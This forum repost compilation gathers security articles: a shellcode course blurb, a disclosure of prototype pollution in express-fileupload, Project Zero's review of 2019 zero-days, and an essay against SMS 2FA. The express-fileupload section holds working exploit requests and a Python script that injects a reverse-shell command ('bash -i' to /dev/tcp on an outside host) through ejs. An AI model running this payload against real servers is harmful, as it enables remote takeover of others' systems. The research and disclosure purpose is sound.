Posts posted by Nytro


How to Write Shellcode

5 videos · 169 views · Last updated on 22 Jul 2020

If you have ever struggled or were just curious how a hacker writes shellcode to exploit a vulnerability, then you're in the right place! Evan Walls (@fuzzwalls on Twitter), vulnerability researcher & exploit developer at Tactical Network Solutions, will walk you through a detailed step-by-step process in developing MIPS shellcode. We think this is one of the BEST shellcode tutorials out there. We hope you agree! Enjoy!

The Team at Tactical Network Solutions
https://www.tacnetsol.com

Source: -

Real-world JS 1

Real-world JS Vulnerabilities Series 1

express-fileupload

JavaScript vulnerabilities (prototype pollution, ReDoS, type confusion, etc.) are a popular topic in recent security competitions such as CTFs.

But there seems to be a lack of real-world research on them, so I started this research to find such bugs and share the data. This research aims to improve the security level of the Node.js ecosystem.

The first case in this series is a vulnerability in express-fileupload.

As the name shows, this module provides file upload functionality as Express middleware.

To date, express-fileupload has been downloaded a total of 7,193,433 times.

The express-fileupload module provides several options for uploading and managing files in a Node.js application.

Among them, the parseNested option expands flattened keys into nested objects. Therefore, if we provide {"a.b.c": true} as input, internally it will be used as {"a": {"b": {"c": true}}}.

    busboy.on('finish', () => {
      debugLog(options, `Busboy finished parsing request.`);
      if (options.parseNested) {
        req.body = processNested(req.body);
        req.files = processNested(req.files);
      }

      if (!req[waitFlushProperty]) return next();
      Promise.all(req[waitFlushProperty])
        .then(() => {
          delete req[waitFlushProperty];
          next();
        }).catch(err => {
          delete req[waitFlushProperty];
          debugLog(options, `Error while waiting files flush: ${err}`);
          next(err);
        });
    });

So, if options.parseNested is set, the handler calls the processNested function, with req.body and req.files as arguments.

    function processNested(data){
      if (!data || data.length < 1) return {};

      let d = {},
        keys = Object.keys(data);

      for (let i = 0; i < keys.length; i++) {
        let key = keys[i],
          value = data[key],
          current = d,
          keyParts = key
            .replace(new RegExp(/\[/g), '.')
            .replace(new RegExp(/\]/g), '')
            .split('.');

        for (let index = 0; index < keyParts.length; index++){
          let k = keyParts[index];
          if (index >= keyParts.length - 1){
            current[k] = value;
          } else {
            if (!current[k]) current[k] = !isNaN(keyParts[index + 1]) ? [] : {};
            current = current[k];
          }
        }
      }

      return d;
    };

The above is the full source of the processNested function.

It provides the nesting ("flatten") behaviour for the keys of req.body and req.files. It splits each key obtained through Object.keys(data) on ".", loops over the resulting parts, and repeatedly dereferences or defines nested objects.
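To make the key handling concrete, here is a minimal sketch of only the key-splitting step, using the same two replace calls and the same split as processNested. The helper name splitKey is hypothetical and is not part of express-fileupload.

```javascript
// Same key normalisation as in processNested: brackets become dots, then split on ".".
// splitKey is a hypothetical helper name used only for this illustration.
function splitKey(key) {
  return key.replace(/\[/g, '.').replace(/\]/g, '').split('.');
}

console.log(splitKey('a.b.c'));              // [ 'a', 'b', 'c' ]
console.log(splitKey('user[name]'));         // [ 'user', 'name' ]
console.log(splitKey('items[0].id'));        // [ 'items', '0', 'id' ]
console.log(splitKey('__proto__.polluted')); // [ '__proto__', 'polluted' ]
```

The last call shows that nothing in this step treats __proto__ differently from any other key part.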

    let some_obj = JSON.parse(`{"__proto__.polluted": true}`);
    processNested(some_obj);

    console.log(polluted); // true!

This function is vulnerable to prototype pollution when used as shown above: the key part __proto__ resolves to Object.prototype, so the final assignment lands on the prototype shared by every object.

Therefore, if we can pass crafted objects to this function, we can affect the Express web application.
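For contrast, here is a minimal sketch of how such a nesting function could refuse dangerous key parts. It is an illustration under my own assumptions, not the fix that express-fileupload actually shipped; the names FORBIDDEN_KEYS and safeProcessNested are hypothetical.

```javascript
// Key parts that can reach Object.prototype when used as path segments.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Hypothetical hardened variant of processNested (not the library's actual patch).
function safeProcessNested(data) {
  if (!data || Object.keys(data).length < 1) return {};

  const result = Object.create(null); // no prototype to walk into
  for (const key of Object.keys(data)) {
    const keyParts = key.replace(/\[/g, '.').replace(/\]/g, '').split('.');

    // Skip the whole key if any part targets the prototype chain.
    if (keyParts.some((part) => FORBIDDEN_KEYS.has(part))) continue;

    let current = result;
    keyParts.forEach((part, index) => {
      if (index === keyParts.length - 1) {
        current[part] = data[key];
      } else {
        if (!Object.prototype.hasOwnProperty.call(current, part)) {
          // A purely numeric next part means an array was intended.
          current[part] = /^\d+$/.test(keyParts[index + 1]) ? [] : Object.create(null);
        }
        current = current[part];
      }
    });
  }
  return result;
}

const nested = safeProcessNested(JSON.parse('{"a.b.c": true, "__proto__.polluted": true}'));
console.log(nested.a.b.c);        // true
console.log(({}).polluted);       // undefined
```

Dropping the offending key entirely and building the result from prototype-less objects are two independent precautions; either one alone would stop the payload used in this post.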

    const express = require('express');
    const fileUpload = require('express-fileupload');
    const app = express();

    app.use(fileUpload({ parseNested: true }));

    app.get('/', (req, res) => {
        res.end('express-fileupload poc');
    });

    app.listen(7777)

Next, configure and run an Express server that uses express-fileupload as shown above.

    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=--------1566035451
    Content-Length: 123

    ----------1566035451
    Content-Disposition: form-data; name="name"; filename="filename"

    content
    ----------1566035451--

Then send the POST request above.

We can confirm that an object is passed as the argument to the processNested function. (I added code for debugging.)

    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=--------1566035451
    Content-Length: 137

    ----------1566035451
    Content-Disposition: form-data; name="__proto__.toString"; filename="filename"

    content
    ----------1566035451--

Let’s try prototype pollution.

If we send the request above, with the name changed to __proto__.toString, an object with the key __proto__.toString is created and passed to the processNested function, which pollutes the toString method of Object.prototype.

From the moment this value is overwritten with an object that is not a function, the Express application throws an error on every request!

    var isRegExp = function isRegExp(obj) {
        return Object.prototype.toString.call(obj) === '[object RegExp]';
    };

The qs module used within Express parses the query string (location.search) of the HTTP request into the req.query object.

In that logic, qs uses Object.prototype.toString.

Therefore, this function is called for every request in the Express application (even if there is no query string).

If Object.prototype.toString is polluted, this call throws an error, and Express returns a 500 error for every request.
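The failure can be reproduced in isolation, without Express or qs. The sketch below reuses the isRegExp check quoted above, temporarily replaces Object.prototype.toString with a plain object, and restores it afterwards; the helper name callAfterPollution is hypothetical.

```javascript
// The same check that qs performs (copied from the snippet above).
const isRegExp = function isRegExp(obj) {
  return Object.prototype.toString.call(obj) === '[object RegExp]';
};

// Keep the original so the demo can undo the damage afterwards.
const originalToString = Object.prototype.toString;

// callAfterPollution is a hypothetical helper for this illustration.
function callAfterPollution(pollutedValue) {
  Object.prototype.toString = pollutedValue; // what the upload request effectively does
  try {
    isRegExp(/x/);
    return 'ok';
  } catch (err) {
    return err.constructor.name;
  } finally {
    Object.prototype.toString = originalToString; // always restore
  }
}

console.log(isRegExp(/x/));                          // true
console.log(callAfterPollution({ name: 'file' }));   // TypeError
console.log(isRegExp(/x/));                          // true again after the restore
```

A plain object has no call method, so Object.prototype.toString.call(obj) throws a TypeError, which is what surfaces as the 500 response.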

    import requests

    res = requests.post('http://p6.is:7777', files = {'__proto__.toString': 'express-fileupload poc'});

Indeed, if we use the script above to pollute the prototype of the server, then for all requests the server returns either error messages (in development mode) or only a blank screen and 500 Internal Server Error! 😮

How to get shell?

We can already cause a DoS, but everyone wants a shell.

So, I’ll describe one way to acquire a shell through the vulnerability above.

The simplest way to obtain a shell through prototype pollution in an Express application is by using ejs.

Yes, there is a limitation: the application must be using the ejs template engine.

But EJS is one of the most popular template engines for Node.js and is very often used in combination with Express. If this vulnerability exists, you can bet on this. (No guarantees 😏)

    const express = require('express');
    const fileUpload = require('express-fileupload');
    const app = express();

    app.use(fileUpload({ parseNested: true }));

    app.get('/', (req, res) => {
        console.log(Object.prototype.polluted);
        res.render('index.ejs');
    });

    app.listen(7777);

The above is an example of using the ejs module.

Only one line changed, to switch the rendering engine. Because the parseNested option is still active, we can still pollute the prototype.

Unlike above, here I will use the req.body object, because we can control its value as a string.

    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=--------1566035451
    Content-Length: 137

    ----------1566035451
    Content-Disposition: form-data; name="__proto__.polluted";

    content
    ----------1566035451--

This is similar to the request above, but the filename parameter of Content-Disposition has been removed.

The value then goes to req.body, not req.files.

By checking the values that enter the processNested function, you can see that the values that were previously objects are now strings. The pollution happens the same as before.

    function Template(text, opts) {
      opts = opts || {};
      var options = {};
      this.templateText = text;
      /** @type {string | null} */
      ...
      options.outputFunctionName = opts.outputFunctionName;
      options.localsName = opts.localsName || exports.localsName || _DEFAULT_LOCALS_NAME;
      options.views = opts.views;
      options.async = opts.async;

The target value to pollute is outputFunctionName, which is an option in the ejs rendering function.

    compile: function () {
      /** @type {string} */
      var src;
      /** @type {ClientFunction} */
      var fn;
      var opts = this.opts;
      var prepended = '';
      var appended = '';
      /** @type {EscapeCallback} */
      var escapeFn = opts.escapeFunction;
      /** @type {FunctionConstructor} */
      var ctor;

      if (!this.source) {
        this.generateSource();
        prepended +=
          ' var __output = "";\n' +
          ' function __append(s) { if (s !== undefined && s !== null) __output += s }\n';
        if (opts.outputFunctionName) {
          prepended += ' var ' + opts.outputFunctionName + ' = __append;' + '\n';
        }
        if (opts.destructuredLocals && opts.destructuredLocals.length) {
          var destructuring = ' var __locals = (' + opts.localsName + ' || {}),\n';
          for (var i = 0; i < opts.destructuredLocals.length; i++) {
            var name = opts.destructuredLocals[i];
            if (i > 0) {
              destructuring += ',\n ';
            }
            destructuring += name + ' = __locals.' + name;
          }
          prepended += destructuring + ';\n';
        }
        if (opts._with !== false) {
          prepended += ' with (' + opts.localsName + ' || {}) {' + '\n';
          appended += ' }' + '\n';
        }
        appended += ' return __output;' + '\n';
        this.source = prepended + this.source + appended;
      }

ejs builds a Function to implement and execute the template, and the outputFunctionName option is included in that function's source. Therefore, if we can manipulate this value, any command can be executed.

This technique was introduced in a Chinese CTF in 2019. Please refer to the XNUCA2019Qualifier hardjs challenge in the references for details.

That part has not been patched so far, and it is expected to remain so in the future.

So we can take advantage of it.
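The root cause is plain string concatenation into generated source code. The following is a simplified stand-in for that pattern with a harmless payload, not the real ejs code path; buildSource, compileTemplate, and isIdentifier are hypothetical names, and the identifier check at the end is just one possible mitigation.

```javascript
// Simplified stand-in for the way the option is prepended to the compiled template.
// buildSource and compileTemplate are hypothetical names, not ejs APIs.
function buildSource(opts, body) {
  let prepended = 'var __output = "";\n' +
    'function __append(s) { if (s !== undefined && s !== null) __output += s }\n';
  if (opts.outputFunctionName) {
    // The option is concatenated into source code without validation.
    prepended += 'var ' + opts.outputFunctionName + ' = __append;\n';
  }
  return prepended + body + '\nreturn __output;\n';
}

function compileTemplate(opts, body) {
  return new Function('sideEffects', buildSource(opts, body));
}

// Intended use: the option is a plain identifier.
const normal = compileTemplate({ outputFunctionName: 'echo' }, 'echo("hello");');
console.log(normal([])); // hello

// Injected use: the "name" smuggles in an extra statement (harmless here).
const injected = compileTemplate(
  { outputFunctionName: 'x;sideEffects.push("injected code ran");x' },
  '__append("hello");'
);
const log = [];
console.log(injected(log), log);

// One possible mitigation (an assumption): accept only values that look like identifiers.
const isIdentifier = (name) => /^[A-Za-z_$][A-Za-z0-9_$]*$/.test(name);
console.log(isIdentifier('echo'), isIdentifier('x;y'));
```

The injected value turns `var NAME = __append;` into three statements, which is exactly the x;...;x shape of the payload used in this post.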

    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=--------1566035451
    Content-Length: 221

    ----------1566035451
    Content-Disposition: form-data; name="__proto__.outputFunctionName";

    x;process.mainModule.require('child_process').exec('bash -c "bash -i &> /dev/tcp/p6.is/8888 0>&1"');x
    ----------1566035451--

So first, we pollute Object.prototype.outputFunctionName using the prototype pollution.

    GET / HTTP/1.1
    Host: p6.is:7777

Then we request a page so that the ejs template function is called.

Then we get the shell!

The whole process can be expressed in Python:

    import requests

    cmd = 'bash -c "bash -i &> /dev/tcp/p6.is/8888 0>&1"'

    # pollute
    requests.post('http://p6.is:7777', files = {'__proto__.outputFunctionName': (
        None, f"x;console.log(1);process.mainModule.require('child_process').exec('{cmd}');x")})

    # execute command
    requests.get('http://p6.is:7777')

Reference

- https://github.com/richardgirges/express-fileupload/issues/236

- https://www.npmjs.com/package/express-fileupload

- https://github.com/NeSE-Team/OurChallenges/tree/master/XNUCA2019Qualifier/Web/hardjs

-

I'm a bug bounty hunter who's learning everyday and sharing useful resources as I move along. Subscribe to my channel because I'll be sharing my knowledge in new videos regularly.


Detection Deficit: A Year in Review of 0-days Used In-The-Wild in 2019



Posted by Maddie Stone, Project Zero

In May 2019, Project Zero released our tracking spreadsheet for 0-days used “in the wild” and we started a more focused effort on analyzing and learning from these exploits. This is another way Project Zero is trying to make zero-day hard. This blog post synthesizes many of our efforts and what we’ve seen over the last year. We provide a review of what we can learn from 0-day exploits detected as used in the wild in 2019. In conjunction with this blog post, we are also publishing another blog post today about our root cause analysis work that informed the conclusions in this Year in Review. We are also releasing 8 root cause analyses that we have done for in-the-wild 0-days from 2019.

When I had the idea for this “Year in Review” blog post, I immediately started brainstorming the different ways we could slice the data and the different conclusions it may show. I thought that maybe there’d be interesting conclusions around why use-after-free is one of the most exploited bug classes or how a given exploitation method was used in Y% of 0-days or… but despite my attempts to find these interesting technical conclusions, over and over I kept coming back to the problem of the detection of 0-days. Through the variety of areas I explored, the data and analysis continued to highlight a single conclusion: As a community, our ability to detect 0-days being used in the wild is severely lacking to the point that we can’t draw significant conclusions due to the lack of (and biases in) the data we have collected.

The rest of the blog post will detail the analyses I did on 0-days exploited in 2019 that informed this conclusion. As a team, Project Zero will continue to research new detection methods for 0-days. We hope this post will convince you to work with us on this effort.

The Basics

In 2019, 20 0-days were detected and disclosed as exploited in the wild. This number, and our tracking, is scoped to targets and areas that Project Zero actively researches. You can read more about our scoping here. This seems approximately average for years 2014-2017 with an uncharacteristically low number of 0-days detected in 2018. Please note that Project Zero only began tracking the data in July 2014 when the team was founded and so the numbers for 2014 have been doubled as an approximation.

The largely steady number of detected 0-days might suggest that defender detection techniques are progressing at the same speed as attacker techniques. That could be true. Or it could not be. The data in our spreadsheet are only the 0-day exploits that were detected, not the 0-day exploits that were used. As long as we still don’t know the true detection rate of all 0-day exploits, it’s very difficult to draw any conclusions about whether the number of 0-day exploits deployed in the wild is increasing or decreasing. For example, if all defenders stopped detection efforts, that could make it appear that there are no 0-days being exploited, but we’d clearly know that to be false.

All of the 0-day exploits detected in 2019 are detailed in the Project Zero tracking spreadsheet here.

0-days by Vendor

One of the common ways to analyze vulnerabilities and security issues is to look at who is affected. The breakdown of the 0-days exploited in 2019 by vendor is below. While the data shows us that almost all of the big platform vendors have at least a couple of 0-days detected against their products, there is a large disparity. Based on the data, it appears that Microsoft products are targeted about 5x more than Apple and Google products. Yet Apple and Google, with their iOS and Android products, make up a huge majority of devices in the world.

While Microsoft Windows has always been a prime target for actors exploiting 0-days, I think it’s more likely that we see more Microsoft 0-days due to detection bias. Because Microsoft has been a target since before some of the other platforms were even invented, there have been many more years of development into 0-day detection solutions for Microsoft products. Microsoft’s ecosystem also allows for 3rd parties, in addition to Microsoft itself, to deploy detection solutions for 0-days. More people looking for 0-days using varied detection methodologies suggests more 0-days will be found.

Microsoft Deep-Dive

For 2019, there were 11 0-day exploits detected in-the-wild in Microsoft products, more than 50% of all 0-days detected. Therefore, I think it’s worthwhile to dive into the Microsoft bugs to see what we can learn since it’s the only platform we have a decent sample size for.

Of the 11 Microsoft 0-days, only 4 were detected as exploiting the latest software release of Windows. All others targeted earlier releases of Windows, such as Windows 7, which was originally released in 2009. Of the 4 0-days that exploited the latest versions of Windows, 3 targeted Internet Explorer, which, while it’s not the default browser for Windows 10, is still included in the operating system for backwards compatibility. This means that 10/11 of the Microsoft vulnerabilities targeted legacy software.

Out of the 11 Microsoft 0-days, 6 targeted the Win32k component of the Windows operating system. Win32k is the kernel component responsible for the windows subsystem, and historically it has been a prime target for exploitation. However, with Windows 10, Microsoft dedicated resources to locking down the attack surface of win32k. Based on the data of detected 0-days, none of the 6 detected win32k exploits were detected as exploiting the latest Windows 10 software release. And 2 of the 0-days (CVE-2019-0808 and CVE-2019-1132) only affected Windows 7.

Even just within the Microsoft 0-days, there is likely detection bias. Is legacy software really the predominant target for 0-days in Microsoft Windows, or are we just better at detecting them since this software and these exploit techniques have been around the longest?

Version columns in the table: Windows 7 SP1, Windows 8.1, Windows 10, Win 10 1607, Win 10 1703, Win 10 1803, Win 10 1809, Win 10 1903.

| CVE | Versions marked (X) | Exploitation of Latest SW Release? | Component |
| --- | --- | --- | --- |
| CVE-2019-0676 | XXXXXXX | Yes (1809) | IE |
| CVE-2019-0808 | X | N/A (1809) | win32k |
| CVE-2019-0797 | XXXXXX | Exploitation Unlikely (1809) | win32k |
| CVE-2019-0703 | XXXXXXX | Yes (1809) | Windows SMB |
| CVE-2019-0803 | XXXXXXX | Exp More Likely (1809) | win32k |
| CVE-2019-0859 | XXXXXXX | Exp More Likely (1809) | win32k |
| CVE-2019-0880 | XXXXXXXX | Exp More Likely (1903) | splwow64 |
| CVE-2019-1132 | X | N/A (1903) | win32k |
| CVE-2019-1367 | XXXXXXXX | Yes (1903) | IE |
| CVE-2019-1429 | XXXXXXX | Yes (1903) | IE |
| CVE-2019-1458 | XXXX | N/A (1909) | win32k |

Internet Explorer JScript 0-days CVE-2019-1367 and CVE-2019-1429

While this blog post’s goal is not to detail each 0-day used in 2019, it’d be remiss not to discuss the Internet Explorer JScript 0-days. CVE-2019-1367 and CVE-2019-1429 (and CVE-2018-8653 from Dec 2018 and CVE-2020-0674 from Feb 2020) are all variants of each other with all 4 being exploited in the wild by the same actor according to Google’s Threat Analysis Group (TAG).

Our root cause analysis provides more details on these bugs, but we’ll summarize the points here. The bug class is a JScript variable not being tracked by the garbage collector. Multiple instances of this bug class were discovered in Jan 2018 by Ivan Fratric of Project Zero. In December 2018, Google's TAG discovered this bug class being used in the wild (CVE-2018-8653). Then in September 2019, another exploit using this bug class was found. This issue was “fixed” as CVE-2019-1367, but it turns out the patch didn’t actually fix the issue and the attackers were able to continue exploiting the original bug. At the same time, a variant was also found of the original bug by Ivan Fratric (P0 1947). Both the variant and the original bug were fixed as CVE-2019-1429. Then in January 2020, TAG found another exploit sample, because Microsoft’s patch was again incomplete. This issue was patched as CVE-2020-0674.

A more thorough discussion on variant analysis and complete patches is due, but at this time we’ll simply note: The attackers who used the 0-day exploit had 4 separate chances to continue attacking users after the bug class and then particular bugs were known. If we as an industry want to make 0-day harder, we can’t give attackers four chances at the same bug.

Memory Corruption

63% of 2019’s exploited 0-day vulnerabilities fall under memory corruption, with half of those memory corruption bugs being use-after-free vulnerabilities. Memory corruption and use-after-frees being a common target is nothing new. “Smashing the Stack for Fun and Profit”, the seminal work describing stack-based memory corruption, was published back in 1996. But it’s interesting to note that almost two-thirds of all detected 0-days are still exploiting memory corruption bugs when there’s been so much interesting security research into other classes of vulnerabilities, such as logic bugs and compiler bugs. Again, two-thirds of detected 0-days are memory corruption bugs. While I don’t know for certain that that proportion is false, we can't know either way because it's easier to detect memory corruption than other types of vulnerabilities. Due to the prevalence of memory corruption bugs and the fact that they tend to be less reliable than logic bugs, this could be another detection bias. Types of memory corruption bugs tend to be very similar within platforms and don’t really change over time: a use-after-free from a decade ago largely looks like a use-after-free bug today and so I think we may just be better at detecting these exploits. Logic and design bugs on the other hand rarely look the same because in their nature they’re taking advantage of a specific flaw in the design of that specific component, thus making them more difficult to detect than standard memory corruption vulns.

Even if our data is biased to over-represent memory corruption vulnerabilities, memory corruption vulnerabilities are still being regularly exploited against users and thus we need to continue focusing on systemic and structural fixes such as memory tagging and memory safe languages.

More Thoughts on Detection

As we’ve discussed up to this point, the same questions posed in the team's original blog post still hold true: “What is the detection rate of 0-day exploits?” and “How many 0-day exploits are used without being detected?”.

We, as the security industry, are only able to review and analyze 0-days that were detected, not all 0-days that were used. While some might see this data and say that Microsoft Windows is exploited with 0-days 11x more often than Android, those claims cannot be made in good faith. Instead, I think the security community simply detects 0-days in Microsoft Windows at a much higher rate than any other platform. If we look back historically, the first anti-viruses and detections were built for Microsoft Windows rather than any other platform. As time has continued, the detection methods for Windows have continued to evolve. Microsoft, as well as third party security companies, builds tools and techniques for detecting 0-days. We don’t see the same plethora of detection tools on other platforms, especially the mobile platforms, which means there’s less likelihood of detecting 0-days on those platforms too. An area for big growth is detecting 0-days on platforms other than Microsoft Windows and what level of access a vendor provides for detection.

Who is doing the detecting?

Another interesting side of detection is that a single security researcher, Clément Lecigne of Google's TAG, is credited with 7 of the 21 detected 0-days in 2019 across 4 platforms: Apple iOS (CVE-2019-7286, CVE-2019-7287), Google Chrome (CVE-2019-5786), Microsoft Internet Explorer (CVE-2019-0676, CVE-2019-1367, CVE-2019-1429), and Microsoft Windows (CVE-2019-0808). Put another way, we could have detected a third fewer of the 0-days actually used in the wild if it wasn’t for Clément and team. When we add in the entity with the second most, Kaspersky Lab, with 4 of the 0-days (CVE-2019-0797, CVE-2019-0859, CVE-2019-13720, CVE-2019-1458), that means that two entities are responsible for more than 50% of the 0-days detected in 2019. If two entities out of the entirety of the global security community are responsible for detecting more than half of the 0-days in a year, that’s a worrying sign for how we’re using our resources. The security community has a lot of growth to do in this area to have any confidence that we are detecting the majority of 0-day exploits that are used in the wild.

Out of the 20 0-days, only one (CVE-2019-0703) included discovery credit to the vendor that was targeted, and even that one was also credited to an external researcher. To me, this is surprising because I’d expect that the vendor of a platform would be best positioned to detect 0-days with their access to the most telemetry data, logs, ability to build detections into the platform, “tips” about exploits, etc. This begs the question: are the vendor security teams that have the most access not putting resources towards detecting 0-days, or are they finding them and just not disclosing them when they are found internally? Either way, this is less than ideal. When you consider the locked down mobile platforms, this is especially worrisome since it’s so difficult for external researchers to get into those platforms and detect exploitation.

“Clandestine” 0-day reporting

Anecdotally, we know that sometimes vulnerabilities are reported surreptitiously, meaning that they are reported as just another bug, rather than a vulnerability that is being actively exploited. This hurts security because users and their enterprises may take different actions, based on their own unique threat models, if they knew a vulnerability was actively exploited. Vendors and third party security professionals could also create better detections, invest in related research, prioritize variant analysis, or take other actions that could directly make it more costly for the attacker to exploit additional vulnerabilities and users if they knew that attackers were already exploiting the bug. If all would transparently disclose when a vulnerability is exploited, our detection numbers would likely go up as well, and we would have better information about the current preferences and behaviors of attackers.

0-day Detection on Mobile Platforms

As mentioned above, an especially interesting and needed area for development is mobile platforms, iOS and Android. In 2019, there were only 3 detected 0-days for all of mobile: 2 for iOS (CVE-2019-7286 and CVE-2019-7287) and 1 for Android (CVE-2019-2215). However, there are billions of mobile phone users and Android and iOS exploits sell for double or more compared to an equivalent desktop exploit according to Zerodium. We know that these exploits are being developed and used, we’re just not finding them. The mobile platforms, iOS and Android, are likely two of the toughest platforms for third party security solutions to deploy upon due to the “walled garden” of iOS and the application sandboxes of both platforms. The same features that are critical for user security also make it difficult for third parties to deploy on-device detection solutions. Since it’s so difficult for non-vendors to deploy solutions, we as users and the security community, rely on the vendors to be active and transparent in hunting 0-days targeting these platforms. Therefore a crucial question becomes, how do we as fellow security professionals incentivize the vendors to prioritize this?

Another interesting artifact that appeared when doing the analysis is that CVE-2019-2215 is the first detected 0-day since we started tracking 0-days targeting Android. Up until that point, the closest was CVE-2016-5195, which targeted Linux. Yet, the only Android 0-day found in 2019 (AND since 2014) is CVE-2019-2215, which was detected through documents rather than by finding a zero-day exploit sample. Therefore, no 0-day exploit samples were detected (or, at least, publicly disclosed) in all of 2019, 2018, 2017, 2016, 2015, and half of 2014. Based on knowledge of the offensive security industry, we know that that doesn’t mean none were used. Instead it means we aren’t detecting well enough and 0-days are being exploited without public knowledge. Therefore, those 0-days go unpatched and users and the security community are unable to take additional defensive actions. Researching new methodologies for detecting 0-days targeting mobile platforms, iOS and Android, is a focus for Project Zero in 2020.

Detection on Other Platforms

It’s interesting to note that other popular platforms, such as Linux, Safari, or macOS, had no 0-days detected over the same period. While no 0-days have been publicly detected in these platforms, we can have confidence that they are still targets of interest, based on the number of users they have, job requisitions for offensive positions seeking these skills, and even conversations with offensive security researchers. If Trend Micro’s OfficeScan is worth targeting, then so are the other much more prevalent products. If that’s the case, then again it leads us back to detection. We should also keep in mind though that some platforms may not need 0-days for successful exploitation. For example, this blogpost details how iOS exploit chains used publicly known n-days to exploit WebKit. But without more complete data, we can’t make confident determinations of how much 0-day exploitation is occurring per platform.

Conclusion

Here’s our first Year in Review of 0-days exploited in the wild. As this program evolves, so will what we publish based on feedback from you and as our own knowledge and experience continues to grow. We started this effort with the assumption of finding a multitude of different conclusions, primarily “technical”, but once the analysis began, it became clear that everything came back to a single conclusion: we have a big gap in detecting 0-day exploits. Project Zero is committed to continuing to research new detection methodologies for 0-day exploits and sharing that knowledge with the world.

Along with publishing this Year in Review today, we’re also publishing the root cause analyses that we completed, which were used to draw our conclusions. Please check out the blog post if you’re interested in more details about the different 0-days exploited in the wild in 2019.

Posted by Tim at 10:27 AM

You don’t need SMS-2FA.

I believe that SMS 2FA is wholly ineffective, and advocating for it is harmful. This post will respond to the three main arguments SMS proponents make, and propose a simpler, cheaper, more accessible and more effective solution that works today.

Just like yesterday's topic of reproducible builds, discussions about SMS-2FA get heated very quickly. I've found that SMS-2FA deployment or advocacy has been a major professional project for some people, and they take questioning its efficacy personally.

Here are the main arguments I’ve heard for SMS 2FA:

- SMS 2FA can prevent phishing.
- SMS 2FA can’t prevent phishing, but it can prevent “credential stuffing”.
- We have data proving that SMS 2FA is effective.

I’ll cover some other weaker arguments I’ve heard too, but these are the important ones.

Does SMS 2FA Prevent Phishing?

I assume anyone interested in this topic already knows how phishing works, so I’ll spare you the introduction. If a phishing attack successfully collects a victim's credentials, then the user must have incorrectly concluded that the site they’re using is authentic.

The problem with using SMS-2FA to mitigate this problem is that there’s no reason to think that after entering their credentials, they would not also enter any OTP.

I’ve found that lots of people find this attack difficult to visualize, even security engineers. Let’s look at a demonstration video of a penetration testing tool for phishing SMS-2FA codes to see the attack in action.

There are a few key details to notice in this video.

- The SMS received is authentic. It cannot be filtered, blocked or identified as part of a phishing attempt.
- Notice the attacker's console (around 1:05 in the video). For this demonstration it only contains a single session, but could store unlimited sessions. The attacker does not have to be present during the phishing.
- Installing and using this software is no more complicated than installing and using a phishing kit that doesn’t support SMS-2FA.
- An attacker does not need to intercept or modify the SMS, in particular no “links” are added to the SMS (this is a common misconception, even from security engineers).
- The phishing site is a pixel perfect duplicate of the original.

I think a reasonable minimum bar for any mitigation to be considered a “solution” to an attack is that a different attack is required. As SMS-2FA can be defeated with phishing, it simply doesn’t meet that bar.

To reiterate, SMS 2FA can be phished, and therefore is not a solution to phishing.

Does SMS 2FA Prevent “Credential Stuffing”?

Credential stuffing is when the usernames and passwords collected from one compromised site are replayed to another site. This is such a cheap and effective attack that it’s a significant source of compromise.

Credential stuffing works because password reuse is astonishingly common. It’s important to emphasise that if you don’t reuse passwords, you are literally immune to credential stuffing. The argument for SMS-2FA is that credential stuffing can no longer be automated. If that were true, SMS-2FA would qualify as a solution to credential stuffing, as an attacker would need to use a new attack, such as phishing, to obtain the OTP.

Unfortunately, it doesn’t work like that. When a service enables SMS-2FA, an attacker can simply move to a different service. This means that a new attack isn’t necessary, just a new service. The problem is not solved or even mitigated, the user is still compromised and the problem is simply shifted around.

Doesn’t the data show that SMS 2FA Works?

Vendors often report reductions in phishing and credential stuffing attacks after implementing SMS-2FA. Proponents point out that whether SMS-2FA works in theory or not is irrelevant, we can measure and see that it works in practice.

This result can be explained with simple economics.

The opportunistic attackers that use mass phishing campaigns don’t care who they compromise, their goal is to extract a small amount of value from a large number of compromised accounts.

If the vendor implements SMS 2FA, the attacker is forced to upgrade their phishing tools and methodology to support SMS 2FA if they want to compromise those accounts. This is a one-off cost that might require purchasing a new phishing toolkit.

A rational phisher must now calculate if adding support for SMS 2FA will increase their victim yield enough to justify making this investment.

If only 1% of accounts enable SMS 2FA, then we can reasonably assume supporting SMS-2FA will increase victim yield by 1%. Will the revenue from a 1% higher victim yield allow the phisher to recoup their investment costs? Today, the adoption is still too low to justify that cost, and this explains why SMS 2FA enabled accounts are phished less often, it simply makes more sense to absorb the loss until penetration is higher.

For targeted (as opposed to opportunistic) phishing, it often does make economic sense to support SMS-2FA today, and we do see phishers implement support for SMS-2FA in their tools and processes.

Even if SMS 2FA is flawed, isn’t that still “raising the bar”?

It is true that, if universally adopted, SMS 2FA would force attackers to make a one-time investment to update their tools and process.

Everyone likes the idea of irritating phishers, they’re criminals who defraud and cheat innocent people. Regardless, we have to weigh the costs of creating that annoyance.

We have a finite pool of good will with which we can advocate for the implementation of new security technologies. If we spend all that good will on irritating attackers, then by the time we’re ready to actually implement a solution, developers are not going to be interested.

This is the basis for my argument that SMS-2FA is not only worthless, but harmful. We’re wasting what little good will we have left.

Are there better solutions than SMS 2FA?

Proponents are quick to respond that something must be done.

Here’s the good news, we already have excellent solutions that actually work, are cheaper, simpler and more accessible.

If you’re a security conscious user...

You don’t need SMS-2FA.

You can use unique passwords, this makes you immune to credential stuffing and reduces the impact of phishing. If you use the password manager built in to modern browsers, it can effectively eliminate phishing as well.

If you use a third party password manager, you might not realize that modern browsers have password management built in with a beautiful UX. Frankly, it’s harder to not use it.

Even if you can’t use a password manager, it is totally acceptable to record your passwords in a paper notebook, spreadsheet, rolodex, or any other method you have available to record data. These are cheap, universally available and accessible.

This is great news: you can take matters into your own hands, with no help from anyone else you can protect yourself and your loved ones from credential stuffing.

Q. What if I install malware, can’t the malware steal my password database?

Yes, but SMS-2FA (and even U2F) also don’t protect against malware. For that, the best solution we have is Application Whitelisting. Therefore, this is not a good reason to use SMS-2FA.

If you’re a security conscious vendor...

You don’t need SMS-2FA.

You can eliminate credential stuffing attacks entirely with a cheap and effective solution.

You are currently allowing your users to choose their own password, and many of them are using the same password they use on other services. There is no other possible way your users are vulnerable to credential stuffing.

Instead, why not simply randomly generate a good password for them, and instruct them to write it down or save it in their web browser? If they lose it, they can use your existing password reset procedure.

